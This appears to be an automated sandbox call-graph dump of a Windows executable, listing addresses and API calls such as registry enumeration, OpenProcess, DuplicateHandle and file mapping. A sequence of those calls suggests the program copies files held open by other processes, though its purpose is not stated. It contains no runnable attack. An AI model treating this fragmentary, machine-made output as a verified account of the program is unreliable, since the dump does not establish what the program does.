40a8cc 38858->38448 38859 40a8d0 7 API calls 38859->38858 39024 40b1ab ??3@YAXPAX ??3@YAXPAX 38860->39024 38862 40c3dd 38863 40b2cc 27 API calls 38862->38863 38864 40c3e7 38863->38864 39025 414592 RegOpenKeyExW 38864->39025 38866 40c3f4 38867 40c50e 38866->38867 38868 40c3ff 38866->38868 38882 405337 38867->38882 38869 40a9ce 4 API calls 38868->38869 38870 40c418 memset 38869->38870 39026 40aa1d 38870->39026 38873 40c471 38875 40c47a _wcsupr 38873->38875 38874 40c505 38874->38867 38876 40a8d0 7 API calls 38875->38876 38877 40c498 38876->38877 38878 40a8d0 7 API calls 38877->38878 38879 40c4ac memset 38878->38879 38880 40aa1d 38879->38880 38881 40c4e4 RegEnumValueW 38880->38881 38881->38874 38881->38875 39028 405220 38882->39028 38886 4099c6 2 API calls 38885->38886 38887 40a714 _wcslwr 38886->38887 38888 40c634 38887->38888 39085 405361 38888->39085 38891 40c65c wcslen 39088 4053b6 39 API calls 38891->39088 38892 40c71d wcslen 38892->38462 38894 40c677 38895 40c713 38894->38895 39089 40538b 39 API calls 38894->39089 39091 4053df 39 API calls 38895->39091 38898 40c6a5 38898->38895 38899 40c6a9 memset 38898->38899 38900 40c6d3 38899->38900 39090 40c589 43 API calls 38900->39090 38902->38455 38904 40ae18 9 API calls 38903->38904 38910 40c210 38904->38910 38905 40ae51 9 API calls 38905->38910 38906 40c264 38907 40aebe FindClose 38906->38907 38909 40c26f 38907->38909 38908 40add4 2 API calls 38908->38910 38915 40e5ed memset memset 38909->38915 38910->38905 38910->38906 38910->38908 38911 40c231 _wcsicmp 38910->38911 38912 40c1d3 34 API calls 38910->38912 38911->38910 38913 40c248 38911->38913 38912->38910 38928 40c084 21 API calls 38913->38928 38916 414c2e 15 API calls 38915->38916 38917 40e63f 38916->38917 38918 409d1f 6 API calls 38917->38918 38919 40e658 38918->38919 38929 409b98 GetFileAttributesW 38919->38929 38921 40e667 38922 409d1f 6 API calls 38921->38922 38924 40e680 38921->38924 38922->38924 38930 409b98 GetFileAttributesW 38924->38930 38925 40e68f 38926 40c2d8 38925->38926 38931 40e4b2 38925->38931 38926->38838 38926->38839 38928->38910 38929->38921 38930->38925 38952 40e01e 38931->38952 38933 40e593 38935 40e5b0 38933->38935 38936 40e59c DeleteFileW 38933->38936 38934 40e521 38934->38933 38975 40e175 38934->38975 38937 40b04b ??3@YAXPAX 38935->38937 38936->38935 38938 40e5bb 38937->38938 38940 40e5c4 CloseHandle 38938->38940 38941 40e5cc 38938->38941 38940->38941 38943 40b633 ??3@YAXPAX 38941->38943 38942 40e573 38944 40e584 38942->38944 38945 40e57c FindCloseChangeNotification 38942->38945 38946 40e5db 38943->38946 39018 40b1ab ??3@YAXPAX ??3@YAXPAX 38944->39018 38945->38944 38949 40b633 ??3@YAXPAX 38946->38949 38948 40e540 38948->38942 38995 40e2ab 38948->38995 38950 40e5e3 38949->38950 38950->38926 38953 406214 22 API calls 38952->38953 38954 40e03c 38953->38954 38955 40e16b 38954->38955 38956 40dd85 74 API calls 38954->38956 38955->38934 38957 40e06b 38956->38957 38957->38955 38958 40afcf ??2@YAPAXI ??3@YAXPAX 38957->38958 38959 40e08d OpenProcess 38958->38959 38960 40e0a4 GetCurrentProcess DuplicateHandle 38959->38960 38964 40e152 38959->38964 38961 40e0d0 GetFileSize 38960->38961 38962 40e14a CloseHandle 38960->38962 38965 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38961->38965 38962->38964 38963 40e160 38967 40b04b ??3@YAXPAX 38963->38967 38964->38963 38966 406214 22 API calls 38964->38966 38968 40e0ea 38965->38968 38966->38963 38967->38955 38969 4096dc CreateFileW 38968->38969 38970 40e0f1 CreateFileMappingW 38969->38970 38971 40e140 CloseHandle CloseHandle 38970->38971 38972 40e10b MapViewOfFile 38970->38972 38971->38962 38973 40e13b FindCloseChangeNotification 38972->38973 38974 40e11f WriteFile UnmapViewOfFile 38972->38974 38973->38971 38974->38973 38976 40e18c 38975->38976 38977 406b90 11 API calls 38976->38977 38978 40e19f 38977->38978 38979 40e1a7 memset 38978->38979 38980 40e299 38978->38980 38985 40e1e8 38979->38985 38981 4069a3 ??3@YAXPAX ??3@YAXPAX 38980->38981 38982 40e2a4 38981->38982 38982->38948 38983 406e8f 13 API calls 38983->38985 38984 406b53 SetFilePointerEx ReadFile 38984->38985 38985->38983 38985->38984 38986 40dd50 _wcsicmp 38985->38986 38987 40e283 38985->38987 38991 40742e 8 API calls 38985->38991 38992 40aae3 wcslen wcslen _memicmp 38985->38992 38993 40e244 _snwprintf 38985->38993 38986->38985 38988 40e291 38987->38988 38989 40e288 ??3@YAXPAX 38987->38989 38990 40aa04 ??3@YAXPAX 38988->38990 38989->38988 38990->38980 38991->38985 38992->38985 38994 40a8d0 7 API calls 38993->38994 38994->38985 38996 40e2c2 38995->38996 38997 406b90 11 API calls 38996->38997 39013 40e2d3 38997->39013 38998 40e4a0 38999 4069a3 ??3@YAXPAX ??3@YAXPAX 38998->38999 39000 40e4ab 38999->39000 39000->38948 39001 406e8f 13 API calls 39001->39013 39002 406b53 SetFilePointerEx ReadFile 39002->39013 39003 40e489 39004 40aa04 ??3@YAXPAX 39003->39004 39005 40e491 39004->39005 39005->38998 39006 40e497 ??3@YAXPAX 39005->39006 39006->38998 39007 40dd50 _wcsicmp 39007->39013 39008 40dd50 _wcsicmp 39009 40e376 memset 39008->39009 39010 40aa29 6 API calls 39009->39010 39010->39013 39011 40742e 8 API calls 39011->39013 39012 40e3e0 memcpy 39012->39013 39013->38998 39013->39001 39013->39002 39013->39003 39013->39007 39013->39008 39013->39011 39013->39012 39014 40e3b3 wcschr 39013->39014 39015 40e3fb memcpy 39013->39015 39016 40e416 memcpy 39013->39016 39017 40e431 memcpy 39013->39017 39014->39013 39015->39013 39016->39013 39017->39013 39018->38933 39020 40a980 39019->39020 39021 40a995 _wcsicmp 39020->39021 39022 40a99c wcscmp 39020->39022 39023 40a8bb 39020->39023 39021->39020 39022->39020 39023->38858 39023->38859 39024->38862 39025->38866 39027 40aa23 RegEnumValueW 39026->39027 39027->38873 39027->38874 39029 405335 39028->39029 39030 40522a 39028->39030 39029->38462 39031 40b2cc 27 API calls 39030->39031 39032 405234 39031->39032 39033 40a804 8 API calls 39032->39033 39034 40523a 39033->39034 39073 40b273 39034->39073 39036 405248 _mbscpy _mbscat GetProcAddress 39037 40b273 27 API calls 39036->39037 39038 405279 39037->39038 39076 405211 GetProcAddress 39038->39076 39040 405282 39041 40b273 27 API calls 39040->39041 39042 40528f 39041->39042 39077 405211 GetProcAddress 39042->39077 39044 405298 39045 40b273 27 API calls 39044->39045 39046 4052a5 39045->39046 39078 405211 GetProcAddress 39046->39078 39048 4052ae 39049 40b273 27 API calls 39048->39049 39050 4052bb 39049->39050 39079 405211 GetProcAddress 39050->39079 39052 4052c4 39053 40b273 27 API calls 39052->39053 39054 4052d1 39053->39054 39080 405211 GetProcAddress 39054->39080 39056 4052da 39057 40b273 27 API calls 39056->39057 39058 4052e7 39057->39058 39081 405211 GetProcAddress 39058->39081 39060 4052f0 39061 40b273 27 API calls 39060->39061 39062 4052fd 39061->39062 39082 405211 GetProcAddress 39062->39082 39064 405306 39065 40b273 27 API calls 39064->39065 39066 405313 39065->39066 39083 405211 GetProcAddress 39066->39083 39068 40531c 39069 40b273 27 API calls 39068->39069 39070 405329 39069->39070 39084 405211 GetProcAddress 39070->39084 39072 405332 39072->39029 39074 40b58d 27 API calls 39073->39074 39075 40b18c 39074->39075 39075->39036 39076->39040 39077->39044 39078->39048 39079->39052 39080->39056 39081->39060 39082->39064 39083->39068 39084->39072 39086 405220 39 API calls 39085->39086 39087 405369 39086->39087 39087->38891 39087->38892 39088->38894 39089->38898 39090->38895 39091->38892 39093 40440c FreeLibrary 39092->39093 39094 40436d 39093->39094 39095 40a804 8 API calls 39094->39095 39096 404377 39095->39096 39097 404383 39096->39097 39098 404405 39096->39098 39099 40b273 27 API calls 39097->39099 39098->38467 39098->38469 39098->38470 39100 40438d GetProcAddress 39099->39100 39101 40b273 27 API calls 39100->39101 39102 4043a7 GetProcAddress 39101->39102 39103 40b273 27 API calls 39102->39103 39104 4043ba GetProcAddress 39103->39104 39105 40b273 27 API calls 39104->39105 39106 4043ce GetProcAddress 39105->39106 39107 40b273 27 API calls 39106->39107 39108 4043e2 GetProcAddress 39107->39108 39109 4043f1 39108->39109 39110 4043f7 39109->39110 39111 40440c FreeLibrary 39109->39111 39110->39098 39111->39098 39113 404413 FreeLibrary 39112->39113 39114 40441e 39112->39114 39113->39114 39114->38484 39115->38480 39117 40442e 39116->39117 39118 40447e 39116->39118 39119 40b2cc 27 API calls 39117->39119 39118->38480 39120 404438 39119->39120 39121 40a804 8 API calls 39120->39121 39122 40443e 39121->39122 39123 404445 39122->39123 39124 404467 39122->39124 39125 40b273 27 API calls 39123->39125 39124->39118 39127 404475 FreeLibrary 39124->39127 39126 40444f GetProcAddress 39125->39126 39126->39124 39128 404460 39126->39128 39127->39118 39128->39124 39130 4135f6 39129->39130 39131 4135eb FreeLibrary 39129->39131 39130->38487 39131->39130 39133 4449c4 39132->39133 39134 444a52 39132->39134 39135 40b2cc 27 API calls 39133->39135 39134->38504 39134->38509 39136 4449cb 39135->39136 39137 40a804 8 API calls 39136->39137 39138 4449d1 39137->39138 39139 40b273 27 API calls 39138->39139 39140 4449dc GetProcAddress 39139->39140 39141 40b273 27 API calls 39140->39141 39142 4449f3 GetProcAddress 39141->39142 39143 40b273 27 API calls 39142->39143 39144 444a04 GetProcAddress 39143->39144 39145 40b273 27 API calls 39144->39145 39146 444a15 GetProcAddress 39145->39146 39147 40b273 27 API calls 39146->39147 39148 444a26 GetProcAddress 39147->39148 39149 40b273 27 API calls 39148->39149 39150 444a37 GetProcAddress 39149->39150 39151 40b273 27 API calls 39150->39151 39152 444a48 GetProcAddress 39151->39152 39152->39134 39153->38515 39154->38515 39155->38515 39156->38515 39157->38506 39159 403a29 39158->39159 39173 403bed memset memset 39159->39173 39161 403ae7 39186 40b1ab ??3@YAXPAX ??3@YAXPAX 39161->39186 39162 403a3f memset 39167 403a2f 39162->39167 39164 403aef 39164->38523 39165 40a8d0 7 API calls 39165->39167 39166 409d1f 6 API calls 39166->39167 39167->39161 39167->39162 39167->39165 39167->39166 39168 409b98 GetFileAttributesW 39167->39168 39168->39167 39170 40a051 GetFileTime FindCloseChangeNotification 39169->39170 39171 4039ca CompareFileTime 39169->39171 39170->39171 39171->38523 39172->38522 39174 414c2e 15 API calls 39173->39174 39175 403c38 39174->39175 39176 409719 2 API calls 39175->39176 39177 403c3f wcscat 39176->39177 39178 414c2e 15 API calls 39177->39178 39179 403c61 39178->39179 39180 409719 2 API calls 39179->39180 39181 403c68 wcscat 39180->39181 39187 403af5 39181->39187 39184 403af5 20 API calls 39185 403c95 39184->39185 39185->39167 39186->39164 39188 403b02 39187->39188 39189 40ae18 9 API calls 39188->39189 39197 403b37 39189->39197 39190 403bdb 39192 40aebe FindClose 39190->39192 39191 40add4 wcscmp wcscmp 39191->39197 39193 403be6 39192->39193 39193->39184 39194 40ae18 9 API calls 39194->39197 39195 40ae51 9 API calls 39195->39197 39196 40aebe FindClose 39196->39197 39197->39190 39197->39191 39197->39194 39197->39195 39197->39196 39198 40a8d0 7 API calls 39197->39198 39198->39197 39200 409d1f 6 API calls 39199->39200 39201 404190 39200->39201 39214 409b98 GetFileAttributesW 39201->39214 39203 40419c 39204 4041a7 6 API calls 39203->39204 39205 40435c 39203->39205 39206 40424f 39204->39206 39205->38549 39206->39205 39208 40425e memset 39206->39208 39210 409d1f 6 API calls 39206->39210 39211 40a8ab 9 API calls 39206->39211 39215 414842 39206->39215 39208->39206 39209 404296 wcscpy 39208->39209 39209->39206 39210->39206 39212 4042b6 memset memset _snwprintf wcscpy 39211->39212 39212->39206 39213->38547 39214->39203 39218 41443e 39215->39218 39217 414866 39217->39206 39219 41444b 39218->39219 39220 414451 39219->39220 39221 4144a3 GetPrivateProfileStringW 39219->39221 39222 414491 39220->39222 39223 414455 wcschr 39220->39223 39221->39217 39225 414495 WritePrivateProfileStringW 39222->39225 39223->39222 39224 414463 _snwprintf 39223->39224 39224->39225 39225->39217 39226->38553 39228 40b2cc 27 API calls 39227->39228 39229 409615 39228->39229 39230 409d1f 6 API calls 39229->39230 39231 409625 39230->39231 39256 409b98 GetFileAttributesW 39231->39256 39233 409634 39234 409648 39233->39234 39257 4091b8 memset 39233->39257 39235 40b2cc 27 API calls 39234->39235 39238 408801 39234->39238 39237 40965d 39235->39237 39239 409d1f 6 API calls 39237->39239 39238->38556 39238->38583 39240 40966d 39239->39240 39309 409b98 GetFileAttributesW 39240->39309 39242 40967c 39242->39238 39243 409681 39242->39243 39310 409529 72 API calls 39243->39310 39245 409690 39245->39238 39246->38578 39247->38583 39248->38584 39256->39233 39311 40a6e6 WideCharToMultiByte 39257->39311 39259 409202 39312 444432 39259->39312 39262 40b273 27 API calls 39263 409236 39262->39263 39358 438552 39263->39358 39266 409383 39268 40b273 27 API calls 39266->39268 39270 409399 39268->39270 39272 438552 133 API calls 39270->39272 39291 4093a3 39272->39291 39276 4094ff 39387 443d90 39276->39387 39279 4251c4 136 API calls 39279->39291 39281 409507 39289 40951d 39281->39289 39407 408f2f 77 API calls 39281->39407 39283 4093df 39386 424f26 122 API calls 39283->39386 39285 4253cf 17 API calls 39285->39291 39289->39234 39291->39276 39291->39279 39291->39283 39291->39285 39293 4093e4 39291->39293 39384 4253af 17 API calls 39293->39384 39299 4093ed 39385 4253af 17 API calls 39299->39385 39309->39242 39310->39245 39311->39259 39408 4438b5 39312->39408 39314 44444c 39315 409215 39314->39315 39422 415a6d 39314->39422 39315->39262 39315->39289 39317 4442e6 11 API calls 39319 44469e 39317->39319 39318 444486 39320 4444b9 memcpy 39318->39320 39357 4444a4 39318->39357 39319->39315 39322 443d90 110 API calls 39319->39322 39426 415258 39320->39426 39322->39315 39323 444524 39324 444541 39323->39324 39325 44452a 39323->39325 39429 444316 39324->39429 39326 416935 16 API calls 39325->39326 39326->39357 39329 444316 18 API calls 39330 444563 39329->39330 39331 444316 18 API calls 39330->39331 39332 44456f 39331->39332 39333 444316 18 API calls 39332->39333 39357->39317 39496 438460 39358->39496 39360 409240 39360->39266 39361 4251c4 39360->39361 39508 424f07 39361->39508 39363 4251e4 39364 4251f7 39363->39364 39365 4251e8 39363->39365 39516 4250f8 39364->39516 39515 4446ea 11 API calls 39365->39515 39367 4251f2 39384->39299 39386->39276 39388 443da3 39387->39388 39389 443db6 39387->39389 39532 41707a 11 API calls 39388->39532 39389->39281 39407->39289 39409 4438d0 39408->39409 39418 4438c9 39408->39418 39410 415378 memcpy memcpy 39409->39410 39411 4438d5 39410->39411 39412 4154e2 10 API calls 39411->39412 39413 443906 39411->39413 39411->39418 39412->39413 39414 443970 memset 39413->39414 39413->39418 39417 44398b 39414->39417 39415 4439a0 39416 415700 10 API calls 39415->39416 39415->39418 39420 4439c0 39416->39420 39417->39415 39419 41975c 10 API calls 39417->39419 39418->39314 39419->39415 39420->39418 39421 418981 10 API calls 39420->39421 39421->39418 39423 415a77 39422->39423 39424 415a8d 39423->39424 39425 415a7e memset 39423->39425 39424->39318 39425->39424 39427 4438b5 11 API calls 39426->39427 39428 41525d 39427->39428 39428->39323 39430 444328 39429->39430 39431 444423 39430->39431 39432 44434e 39430->39432 39434 4446ea 11 API calls 39431->39434 39433 432d4e memset memset memcpy 39432->39433 39435 44435a 39433->39435 39440 444381 39434->39440 39437 444375 39435->39437 39442 44438b 39435->39442 39436 432d4e memset memset memcpy 39438 4443ec 39436->39438 39439 416935 16 API calls 39437->39439 39438->39440 39441 416935 16 API calls 39438->39441 39439->39440 39440->39329 39441->39440 39442->39436 39497 41703f 11 API calls 39496->39497 39498 43847a 39497->39498 39499 43848a 39498->39499 39500 43847e 39498->39500 39502 438270 133 API calls 39499->39502 39501 4446ea 11 API calls 39500->39501 39504 438488 39501->39504 39503 4384aa 39502->39503 39503->39504 39505 424f26 122 API calls 39503->39505 39504->39360 39506 4384bb 39505->39506 39507 438270 133 API calls 39506->39507 39507->39504 39509 424f1f 39508->39509 39510 424f0c 39508->39510 39512 424eea 11 API calls 39509->39512 39511 416760 11 API calls 39510->39511 39513 424f18 39511->39513 39514 424f24 39512->39514 39513->39363 39514->39363 39515->39367 39517 425108 39516->39517 39523 42510d 39516->39523 39521 425115 39523->39521 39565 413f4f 39538->39565 39541 413f37 K32GetModuleFileNameExW 39542 413f4a 39541->39542 39542->38616 39544 413969 wcscpy 39543->39544 39545 41396c wcschr 39543->39545 39557 413a3a 39544->39557 39545->39544 39547 41398e 39545->39547 39570 4097f7 wcslen wcslen _memicmp 39547->39570 39549 41399a 39550 4139a4 memset 39549->39550 39551 4139e6 39549->39551 39571 409dd5 GetWindowsDirectoryW wcscpy 39550->39571 39553 413a31 wcscpy 39551->39553 39554 4139ec memset 39551->39554 39553->39557 39572 409dd5 GetWindowsDirectoryW wcscpy 39554->39572 39555 4139c9 wcscpy wcscat 39555->39557 39557->38616 39558 413a11 memcpy wcscat 39558->39557 39560 413cb0 GetModuleHandleW 39559->39560 39561 413cda 39559->39561 39560->39561 39562 413cbf GetProcAddress 39560->39562 39563 413ce3 GetProcessTimes 39561->39563 39564 413cf6 39561->39564 39562->39561 39563->38618 39564->38618 39566 413f2f 39565->39566 39567 413f54 39565->39567 39566->39541 39566->39542 39568 40a804 8 API calls 39567->39568 39569 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39568->39569 39569->39566 39570->39549 39571->39555 39572->39558 39573->38638 39574->38662 39576 409cf9 GetVersionExW 39575->39576 39577 409d0a 39575->39577 39576->39577 39577->38668 39577->38672 39578->38674 39579->38677 39580->38679 39581->38744 39583 40bba5 39582->39583 39630 40cc26 39583->39630 39586 40bd4b 39651 40cc0c 39586->39651 39591 40b2cc 27 API calls 39592 40bbef 39591->39592 39658 40ccf0 _wcsicmp 39592->39658 39594 40bbf5 39594->39586 39659 40ccb4 6 API calls 39594->39659 39596 40bc26 39597 40cf04 17 API calls 39596->39597 39598 40bc2e 39597->39598 39599 40bd43 39598->39599 39600 40b2cc 27 API calls 39598->39600 39601 40cc0c 4 API calls 39599->39601 39602 40bc40 39600->39602 39601->39586 39660 40ccf0 _wcsicmp 39602->39660 39604 40bc46 39604->39599 39605 40bc61 memset memset WideCharToMultiByte 39604->39605 39661 40103c strlen 39605->39661 39607 40bcc0 39608 40b273 27 API calls 39607->39608 39609 40bcd0 memcmp 39608->39609 39609->39599 39610 40bce2 39609->39610 39611 404423 37 API calls 39610->39611 39612 40bd10 39611->39612 39612->39599 39613 40bd3a LocalFree 39612->39613 39614 40bd1f memcpy 39612->39614 39613->39599 39614->39613 39615->38758 39617 409a74 GetTempFileNameW 39616->39617 39618 409a66 GetWindowsDirectoryW 39616->39618 39617->38756 39618->39617 39619->38793 39620->38793 39621->38793 39622->38793 39623->38793 39624->38793 39625->38793 39626->38793 39627->38793 39628->38769 39629->38790 39662 4096c3 CreateFileW 39630->39662 39632 40cc34 39633 40cc3d GetFileSize 39632->39633 39641 40bbca 39632->39641 39634 40afcf 2 API calls 39633->39634 39635 40cc64 39634->39635 39663 40a2ef ReadFile 39635->39663 39637 40cc71 39664 40ab4a MultiByteToWideChar 39637->39664 39639 40cc95 FindCloseChangeNotification 39640 40b04b ??3@YAXPAX 39639->39640 39640->39641 39641->39586 39642 40cf04 39641->39642 39643 40b633 ??3@YAXPAX 39642->39643 39644 40cf14 39643->39644 39670 40b1ab ??3@YAXPAX ??3@YAXPAX 39644->39670 39646 40bbdd 39646->39586 39646->39591 39647 40cf1b 39647->39646 39649 40cfef 39647->39649 39671 40cd4b 39647->39671 39650 40cd4b 14 API calls 39649->39650 39650->39646 39652 40b633 ??3@YAXPAX 39651->39652 39653 40cc15 39652->39653 39654 40aa04 ??3@YAXPAX 39653->39654 39655 40cc1d 39654->39655 39715 40b1ab ??3@YAXPAX ??3@YAXPAX 39655->39715 39657 40b7d4 memset CreateFileW 39657->38750 39657->38751 39658->39594 39659->39596 39660->39604 39661->39607 39662->39632 39663->39637 39665 40ab93 39664->39665 39666 40ab6b 39664->39666 39665->39639 39667 40a9ce 4 API calls 39666->39667 39668 40ab74 39667->39668 39669 40ab7c MultiByteToWideChar 39668->39669 39669->39665 39670->39647 39672 40cd7b 39671->39672 39705 40aa29 6 API calls 39672->39705 39674 40cef5 39675 40aa04 ??3@YAXPAX 39674->39675 39676 40cefd 39675->39676 39676->39647 39677 40cd89 39677->39674 39706 40aa29 6 API calls 39677->39706 39679 40ce1d 39707 40aa29 6 API calls 39679->39707 39681 40ce3e 39682 40ce6a 39681->39682 39708 40abb7 wcslen memmove 39681->39708 39683 40ce9f 39682->39683 39711 40abb7 wcslen memmove 39682->39711 39686 40a8d0 7 API calls 39683->39686 39689 40ceb5 39686->39689 39687 40ce56 39709 40aa71 wcslen 39687->39709 39688 40ce8b 39712 40aa71 wcslen 39688->39712 39695 40a8d0 7 API calls 39689->39695 39692 40ce5e 39710 40abb7 wcslen memmove 39692->39710 39693 40ce93 39713 40abb7 wcslen memmove 39693->39713 39697 40cecb 39695->39697 39714 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39697->39714 39699 40cedd 39700 40aa04 ??3@YAXPAX 39699->39700 39701 40cee5 39700->39701 39702 40aa04 ??3@YAXPAX 39701->39702 39703 40ceed 39702->39703 39704 40aa04 ??3@YAXPAX 39703->39704 39704->39674 39705->39677 39706->39679 39707->39681 39708->39687 39709->39692 39710->39682 39711->39688 39712->39693 39713->39683 39714->39699 39715->39657 39716->38809 39717->38817 37544 44dea5 37545 44deb5 FreeLibrary 37544->37545 37546 44dec3 37544->37546 37545->37546 37734 4426a9 37739 4324d3 37734->37739 37736 4426d2 37753 431a7b 146 API calls 37736->37753 37738 4426e3 37738->37738 37740 4324e3 37739->37740 37741 4324da 37739->37741 37745 4324e8 37740->37745 37758 43240a 12 API calls 37740->37758 37754 415a91 37741->37754 37744 4324fd 37746 432513 37744->37746 37747 432508 37744->37747 37745->37736 37760 43034a 37746->37760 37759 4325ad memset 37747->37759 37750 43250e 37750->37736 37751 432548 37752 43034a memcpy 37751->37752 37752->37750 37753->37738 37755 415a9d 37754->37755 37756 415ab3 37755->37756 37757 415aa4 memset 37755->37757 37756->37740 37757->37756 37758->37744 37759->37750 37761 430359 37760->37761 37762 43034e 37760->37762 37761->37751 37764 415c23 memcpy 37762->37764 37764->37761 39727 4148b6 FindResourceW 39728 4148cf SizeofResource 39727->39728 39731 4148f9 39727->39731 39729 4148e0 LoadResource 39728->39729 39728->39731 39730 4148ee LockResource 39729->39730 39729->39731 39730->39731 37728 415304 ??3@YAXPAX 37547 415320 realloc 37548 415340 37547->37548 37549 41534d 37547->37549 37551 416760 11 API calls 37549->37551 37551->37548 39732 441b3f 39742 43a9f6 39732->39742 39734 441b61 39915 4386af memset 39734->39915 39736 44189a 39737 442bd4 39736->39737 39738 4418e2 39736->39738 39739 4418ea 39737->39739 39917 441409 memset 39737->39917 39738->39739 39916 4414a9 12 API calls 39738->39916 39743 43aa20 39742->39743 39744 43aadf 39742->39744 39743->39744 39745 43aa34 memset 39743->39745 39744->39734 39746 43aa56 39745->39746 39747 43aa4d 39745->39747 39918 43a6e7 39746->39918 39926 42c02e memset 39747->39926 39752 43aad3 39928 4169a7 11 API calls 39752->39928 39753 43aaae 39753->39744 39753->39752 39768 43aae5 39753->39768 39754 43ac18 39757 43ac47 39754->39757 39930 42bbd5 memcpy memcpy memcpy memset memcpy 39754->39930 39758 43aca8 39757->39758 39931 438eed 16 API calls 39757->39931 39762 43acd5 39758->39762 39933 4233ae 11 API calls 39758->39933 39761 43ac87 39932 4233c5 16 API calls 39761->39932 39934 423426 11 API calls 39762->39934 39766 43ace1 39935 439811 162 API calls 39766->39935 39767 43a9f6 160 API calls 39767->39768 39768->39744 39768->39754 39768->39767 39929 439bbb 22 API calls 39768->39929 39770 43acfd 39775 43ad2c 39770->39775 39936 438eed 16 API calls 39770->39936 39772 43ad19 39937 4233c5 16 API calls 39772->39937 39774 43ad58 39938 44081d 162 API calls 39774->39938 39775->39774 39778 43add9 39775->39778 39942 423426 11 API calls 39778->39942 39779 43ae3a memset 39780 43ae73 39779->39780 39943 42e1c0 146 API calls 39780->39943 39781 43adab 39940 438c4e 162 API calls 39781->39940 39782 43ad6c 39782->39744 39782->39781 39939 42370b memset memcpy memset 39782->39939 39786 43adcc 39941 440f84 12 API calls 39786->39941 39787 43ae96 39944 42e1c0 146 API calls 39787->39944 39790 43aea8 39791 43aec1 39790->39791 39945 42e199 146 API calls 39790->39945 39792 43af00 39791->39792 39946 42e1c0 146 API calls 39791->39946 39792->39744 39796 43af1a 39792->39796 39797 43b3d9 39792->39797 39947 438eed 16 API calls 39796->39947 39802 43b3f6 39797->39802 39806 43b4c8 39797->39806 39798 43b60f 39798->39744 40006 4393a5 17 API calls 39798->40006 39801 43af2f 39948 4233c5 16 API calls 39801->39948 39988 432878 12 API calls 39802->39988 39804 43af51 39949 423426 11 API calls 39804->39949 39812 43b4f2 39806->39812 39994 42bbd5 memcpy memcpy memcpy memset memcpy 39806->39994 39808 43af7d 39950 423426 11 API calls 39808->39950 39995 43a76c 21 API calls 39812->39995 39813 43b529 39996 44081d 162 API calls 39813->39996 39814 43b462 39990 423330 11 API calls 39814->39990 39815 43af94 39951 423330 11 API calls 39815->39951 39819 43afca 39952 423330 11 API calls 39819->39952 39820 43b47e 39823 43b497 39820->39823 39991 42374a memcpy memset memcpy memcpy memcpy 39820->39991 39821 43b544 39824 43b55c 39821->39824 39997 42c02e memset 39821->39997 39992 4233ae 11 API calls 39823->39992 39998 43a87a 162 API calls 39824->39998 39826 43b428 39826->39814 39989 432b60 16 API calls 39826->39989 39827 43afdb 39953 4233ae 11 API calls 39827->39953 39832 43b56c 39836 43b58a 39832->39836 39999 423330 11 API calls 39832->39999 39833 43b4b1 39993 423399 11 API calls 39833->39993 39835 43afee 39954 44081d 162 API calls 39835->39954 40000 440f84 12 API calls 39836->40000 39837 43b4c1 40002 42db80 162 API calls 39837->40002 39842 43b592 40001 43a82f 16 API calls 39842->40001 39845 43b5b4 40003 438c4e 162 API calls 39845->40003 39847 43b5cf 40004 42c02e memset 39847->40004 39849 43b005 39849->39744 39853 43b01f 39849->39853 39955 42d836 162 API calls 39849->39955 39850 43b1ef 39965 4233c5 16 API calls 39850->39965 39853->39850 39963 423330 11 API calls 39853->39963 39964 42d71d 162 API calls 39853->39964 39854 43b212 39966 423330 11 API calls 39854->39966 39856 43b087 39956 4233ae 11 API calls 39856->39956 39857 43add4 39857->39798 40005 438f86 16 API calls 39857->40005 39860 43b22a 39967 42ccb5 11 API calls 39860->39967 39863 43b23f 39968 4233ae 11 API calls 39863->39968 39864 43b10f 39959 423330 11 API calls 39864->39959 39866 43b257 39969 4233ae 11 API calls 39866->39969 39870 43b129 39960 4233ae 11 API calls 39870->39960 39871 43b26e 39970 4233ae 11 API calls 39871->39970 39874 43b09a 39874->39864 39957 42cc15 19 API calls 39874->39957 39958 4233ae 11 API calls 39874->39958 39875 43b282 39971 43a87a 162 API calls 39875->39971 39877 43b13c 39961 440f84 12 API calls 39877->39961 39879 43b29d 39972 423330 11 API calls 39879->39972 39882 43b15f 39962 4233ae 11 API calls 39882->39962 39883 43b2af 39884 43b2b8 39883->39884 39885 43b2ce 39883->39885 39973 4233ae 11 API calls 39884->39973 39974 440f84 12 API calls 39885->39974 39889 43b2c9 39976 4233ae 11 API calls 39889->39976 39890 43b2da 39975 42370b memset memcpy memset 39890->39975 39893 43b2f9 39977 423330 11 API calls 39893->39977 39895 43b30b 39978 423330 11 API calls 39895->39978 39897 43b325 39979 423399 11 API calls 39897->39979 39899 43b332 39980 4233ae 11 API calls 39899->39980 39901 43b354 39981 423399 11 API calls 39901->39981 39903 43b364 39982 43a82f 16 API calls 39903->39982 39905 43b370 39983 42db80 162 API calls 39905->39983 39907 43b380 39984 438c4e 162 API calls 39907->39984 39909 43b39e 39985 423399 11 API calls 39909->39985 39911 43b3ae 39986 43a76c 21 API calls 39911->39986 39913 43b3c3 39987 423399 11 API calls 39913->39987 39915->39736 39916->39739 39917->39737 39919 43a6f5 39918->39919 39920 43a765 39918->39920 39919->39920 40007 42a115 39919->40007 39920->39744 39927 4397fd memset 39920->39927 39924 43a73d 39924->39920 39925 42a115 146 API calls 39924->39925 39925->39920 39926->39746 39927->39753 39928->39744 39929->39768 39930->39757 39931->39761 39932->39758 39933->39762 39934->39766 39935->39770 39936->39772 39937->39775 39938->39782 39939->39781 39940->39786 39941->39857 39942->39779 39943->39787 39944->39790 39945->39791 39946->39791 39947->39801 39948->39804 39949->39808 39950->39815 39951->39819 39952->39827 39953->39835 39954->39849 39955->39856 39956->39874 39957->39874 39958->39874 39959->39870 39960->39877 39961->39882 39962->39853 39963->39853 39964->39853 39965->39854 39966->39860 39967->39863 39968->39866 39969->39871 39970->39875 39971->39879 39972->39883 39973->39889 39974->39890 39975->39889 39976->39893 39977->39895 39978->39897 39979->39899 39980->39901 39981->39903 39982->39905 39983->39907 39984->39909 39985->39911 39986->39913 39987->39857 39988->39826 39989->39814 39990->39820 39991->39823 39992->39833 39993->39837 39994->39812 39995->39813 39996->39821 39997->39824 39998->39832 39999->39836 40000->39842 40001->39837 40002->39845 40003->39847 40004->39857 40005->39798 40006->39744 40008 42a175 40007->40008 40010 42a122 40007->40010 40008->39920 40013 42b13b 146 API calls 40008->40013 40010->40008 40011 42a115 146 API calls 40010->40011 40014 43a174 40010->40014 40038 42a0a8 146 API calls 40010->40038 40011->40010 40013->39924 40028 43a196 